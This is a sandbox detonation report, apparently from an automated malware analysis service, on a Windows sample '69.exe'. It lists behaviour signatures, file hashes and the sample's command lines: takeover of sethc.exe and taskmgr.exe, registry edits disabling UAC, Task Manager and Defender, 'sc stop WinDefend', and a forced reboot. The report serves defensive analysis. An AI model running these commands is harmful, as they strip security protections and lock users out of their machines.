Analysis Overview
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Possible privilege escalation attempt
Stops running service(s)
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Loads dropped DLL
Modifies system executable filetype association
Modifies file permissions
Executes dropped EXE
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-21 19:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-21 19:07
Reported
2024-09-21 19:08
Platform
win7-20240729-en
Max time kernel
7s
Max time network
7s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\reg.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: 33 | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69.exe
"C:\Users\Admin\AppData\Local\Temp\69.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
C:\PerfLogs\windows\exec.exe
"C:\PerfLogs\windows\exec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"
C:\PerfLogs\windows\jumpscare.exe
jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
rnbowspam.exe
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\System32\icacls.exe
icacls "sethc.exe" /granted "Admin":F
C:\Program Files\Windows Media Player\wmplayer.exe
wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\System32\icacls.exe
icacls "taskmgr.exe" /granted "Admin":F
C:\Windows\System32\takeown.exe
takeown /f reg.exe
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\System32\icacls.exe
icacls "reg.exe" /granted "Admin":F
C:\Windows\system32\takeown.exe
takeown /f regedit.exe
C:\Windows\system32\icacls.exe
icacls "regedit.exe" /granted "Admin":F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\shutdown.exe
shutdown -r -t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
C:\PerfLogs\windows\warn.vbs
| MD5 | 2f1738d26b35388f87f905ecc98cf408 |
| SHA1 | f1d20ac33b739f3d50d30891b743ef4374abbc5f |
| SHA256 | 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba |
| SHA512 | e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2 |
C:\PerfLogs\windows\exec.exe
| MD5 | 236f1bc0ecb98edb8efdc31da513e819 |
| SHA1 | 47cc4e73c0f6d717eba708cf468bf6ecb9970086 |
| SHA256 | 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4 |
| SHA512 | e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109 |
C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat
| MD5 | 47814c389b7e63ed5a13aa8dcc435f23 |
| SHA1 | 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7 |
| SHA256 | 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48 |
| SHA512 | 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382 |
C:\PerfLogs\windows\jumpscare.exe
| MD5 | 5425f894a45d90bac30ff9a34d2ad2f3 |
| SHA1 | 3d9b9708b4eb917142e7fb59ba61534db2c84e7b |
| SHA256 | 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2 |
| SHA512 | 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7 |
C:\PerfLogs\windows\rnbowspam.exe
| MD5 | e000d863f54529348b39030cbaf19aad |
| SHA1 | 9138d2cb83508bf24edee9cb581f60700a1c2b9b |
| SHA256 | 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea |
| SHA512 | 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df |
C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat
| MD5 | 517cae8cc74a0ef3cff3ca7f7dc1aa34 |
| SHA1 | af1538a03dfa1678ab2117c715682527e22f2450 |
| SHA256 | a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194 |
| SHA512 | 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573 |
C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat
| MD5 | 5b094d5e0e750e15ab5628f608756249 |
| SHA1 | c73caec179b8baf3833413aaab31c384c48ccd45 |
| SHA256 | 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f |
| SHA512 | 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d |
C:\PerfLogs\windows\rainbow.bat
| MD5 | 9d25a94b77c178f0d19bdd8440aaaade |
| SHA1 | c732a091461e0ebbd69f6f64b70016e13856908c |
| SHA256 | 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9 |
| SHA512 | e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d |
C:\PerfLogs\windows\killrunas.vbs
| MD5 | fb63b21fb318509a75324b1037da7876 |
| SHA1 | ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1 |
| SHA256 | 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05 |
| SHA512 | 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1 |
C:\PerfLogs\windows\logon_overwrte.exe
| MD5 | f8df0742068fa14d5a4502de32acf41b |
| SHA1 | f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0 |
| SHA256 | 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc |
| SHA512 | e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186 |
C:\PerfLogs\windows\69rnspam.exe
| MD5 | 727793378d36b60cae54319b2f5e9e4d |
| SHA1 | 2171ea2f0ea01b39c71ea216a945816fa9ffe751 |
| SHA256 | b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2 |
| SHA512 | 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91 |
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
| MD5 | a6ef45b0aa8443dfea5daaa1bac6a671 |
| SHA1 | b27edc165fd8c892af4442698e623d14dfa87899 |
| SHA256 | 6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2 |
| SHA512 | 13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de |
C:\PerfLogs\windows\tape.mp4
| MD5 | 3784764b2a5db2e23e744eaff79f40c8 |
| SHA1 | 33994de53dcf82b834961421b863181763166954 |
| SHA256 | 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf |
| SHA512 | f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f |
memory/1424-110-0x0000000004760000-0x000000000476A000-memory.dmp
memory/1424-108-0x0000000004760000-0x000000000476A000-memory.dmp
memory/1424-129-0x0000000004550000-0x0000000004750000-memory.dmp
memory/1424-138-0x0000000004F90000-0x0000000004F9A000-memory.dmp
memory/1424-128-0x0000000004550000-0x0000000004750000-memory.dmp
memory/1424-163-0x0000000005600000-0x000000000560A000-memory.dmp
memory/1424-162-0x0000000005600000-0x000000000560A000-memory.dmp
memory/1424-125-0x0000000004550000-0x0000000004750000-memory.dmp
memory/1424-107-0x0000000004390000-0x000000000439A000-memory.dmp
memory/1424-106-0x0000000004390000-0x000000000439A000-memory.dmp